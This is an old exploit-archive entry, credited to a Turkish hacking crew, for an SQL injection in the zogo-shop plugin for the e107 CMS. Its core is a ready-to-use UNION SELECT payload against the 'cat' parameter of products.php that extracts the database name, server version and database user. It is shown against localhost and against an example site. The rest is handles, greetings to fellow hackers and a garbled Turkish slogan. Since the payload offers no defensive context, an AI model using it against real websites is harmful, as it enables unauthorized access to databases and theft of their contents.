e-107 Plugin zogo-shop 1.16 Beta 13 SQL Injection Vulnerability

2008-05-13
ID: 3006
CVE: None
Download vulnerable application: None
By [email protected]_King / t4cs1zkr4L

Zogo-shop 1.16 Beta 13 & e-107 Zozo-shop Plugins remote Sql Inj.

Sql : http://localhost/products.php?cat=-1+union+select+database(),version(),3,4,5,6,user()/*

Greatz : KnockOut / Dr.Hack3r / Crackers_Child / Rm-x / Tr_ip / DreamTurk / Eno7 / Sabot4qe

Online CGI/Perl Dersleri : http://www.coderx.org/Default.aspx?g=posts&t=89 / kac?rmay?n.

-----------------------Her ayr?L?k bir vurgun degmeyin ya$Lar?ma-----------------------

for exmp :

http://www.xxx.com/e107_plugins/zogo-shop/products.php?cat=-1+union+select+database(),version(),3,4,5,6,user()/* 



1-4-2 (www01)